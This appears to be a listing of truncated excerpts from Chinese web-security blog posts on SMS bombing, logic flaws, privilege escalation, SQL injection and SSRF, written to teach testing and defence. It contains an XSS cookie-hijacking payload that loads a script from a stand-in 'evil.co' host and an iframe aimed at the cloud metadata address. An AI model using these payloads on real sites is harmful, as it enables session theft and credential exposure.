短信轰炸 .Fiddler抓包repeat .burpsuite 修改 PHPSESSID ->字典爆破 如选择a-z .burpsuite手机号遍历 防御: 设置图片验证码,每次获取短信验证码之间,先判定图片验证码的正确性. 设置时间限制,前端按钮设置点击事件时间限制. 设置服务器短信下发的时间间隔. 设置每个手机号时间段内获取短信的次数  Cookie劫持 http://www.a.com/test.php?abc="><script src =http://evil.co…
业务逻辑问题是一种设计缺陷.逻辑缺陷表现为设计者或开发者在思考过程中做出的特殊假设存在明显或隐含的错误.精明的攻击者会特别注意目标应用程序采用的逻辑方式,设法了解设计者与开发者做出的可能假设,然后考虑如何攻破这些假设.黑客挖掘逻辑漏洞有两个重点,就是业务流程和HTTP/HTTPS请求篡改. 逻辑错误分类:1.欺骗密码找回功能 程序根据一个验证码来确定是用户本人,但是攻击者可以暴力破解验证码.2.规避交易限制 攻击者篡改数据报,使得购买的商品为负数,或者商品价格为负数.3.越权缺陷 攻击者更改数据…
原文:http://wooyun.jozxing.cc/static/drops/web-5048.html 密码找回逻辑一.用户凭证(密码找回的凭证太弱,暴力破解)1.当当网任意用户密码修改漏洞(http://wooyun.jozxing.cc/static/bugs/wooyun-2012-011833.html)四位数字验证码,暴力猜解.2.微信任意用户密码修改漏洞(http://wooyun.jozxing.cc/static/bugs/wooyun-2012-011720.html)数…
login->register GetPhone->GetPasswd GetPwd->GetPassword 遍历https://xx.com/contacts/new?user_id={userId}文档中插入html代码-<iframe src="http://169.254.169.254/latest/meta-data"> 登录越权 http://www.xx.cn/Login.aspx 绕过 - http://www.xx.cn/html/…
Web安全测试中常见逻辑漏洞解析(实战篇) 简要: 越权漏洞是比较常见的漏洞类型,越权漏洞可以理解为,一个正常的用户A通常只能够对自己的一些信息进行增删改查,但是由于程序员的一时疏忽,对信息进行增删改查的时候没有进行一个判断,判断所需要操作的信息是否属于对应的用户,导致用户A可以操作其他人的信息.​ 逻辑漏洞挖掘一直是安全测试中“经久不衰”的话题.相比SQL注入.XSS漏洞等传统安全漏洞,现在的攻击者更倾向于利用业务逻辑层的应用安全问题,这类问题往往危害巨大,可能造成了企业的资产损失和名誉受损,…
零.前言 最近做专心web安全有一段时间了,但是目测后面的活会有些复杂,涉及到更多的中间件.底层安全.漏洞研究与安全建设等越来越复杂的东东,所以在这里想写一个系列关于web安全基础以及一些讨巧的payload技巧以便于备忘.不是大神.博客内容非常基础,如果真的有人看而且是大牛们,请不要喷我,欢迎指正我的错误(水平有限). 一.越权: 1.本质: 某账户拥有了超出它应有权限范围外的操作许可权. 2.分类: (1)水平越权:横向拥有了同等安全等级.密级等衡量标准账户的权限. (2)垂直越权:纵向拥有…
基于 burpsuite的web逻辑漏洞插件开发 BurpSuite 提供了插件开发接口,支持Java.Python.Ruby语言的扩展.虽然 BApp Store 上面已经提供了很多插件,其中也不乏优秀好用的插件. 推荐几个个人感觉好的插件CO2,Logger++,Autorize,XSS Validator 但是通用化的工具无法完全符合web安全测试人员的特定需求.本节我和大家探讨,如何根据实际需求自己开发出提高安全测试效率的插件.      本次课程主要是从以下四个方面展开 1.为什么要独…
转载地址:https://security.pingan.com/blog/17.html SQL注入 在服务器端要对所有的输入数据验证有效性. 在处理输入之前,验证所有客户端提供的数据,包括所有的参数.URL和HTTP头的内容. 验证输入数据的类型.长度和合法的取值范围. 使用白名单验证允许的输入字符而不是黑名单. 在危险字符输入后进行转义或编码. 明确所有输入正确的字符集. 不使用动态拼接的SQL语句,如果使用对特殊字符进行转义. 设置最小权限运行程序 OS命令注入 不仅要在客户端过滤,也要…
目录 SQL注入 什么是SQL注入? 掌握SQL注入之前需要了解的知识点 SQL注入情况流程分析 有完整的回显报错(最简单的情况)--检索数据: 在HTTP报文中利用注释---危险操作 检索隐藏数据: SQL注入导致逻辑漏洞 SQL注入重点--盲注! 通过触发条件响应来实现SQL盲注 通过触发布尔错误实现SQL盲注--布尔盲注 通过触发时间延迟实现SQL盲注--时延盲注 通过OAST进行盲注--最终大招 双注入 SSRF 攻击 什么是SSRF攻击? 常见SSRF攻击情况 针对服务器本身的SSRF…
在最初学习一些编程语言.一些编程技术的时候,做的更多的是如何使用该技术,如何更好的使用该技术解决问题,而没有去关注它的相关性.关注它的理论支持,这种学习技术的方式是短平快.其实工作中有时候也是这样,公司要推崇一个新技术.一个解决方案,我们总是短平快的去学习如何使用它,按照固定的解决问题思路按着案例进行,这也是一种应对项目紧急的一些措施.个人感觉如果有空闲时间的话,还是分析一下.理解一下.深入了解一下比较好,这些技术是如何交互的.这些技术的理论支持什么.为什么要用这项技术.这项技术的优缺点怎样?这…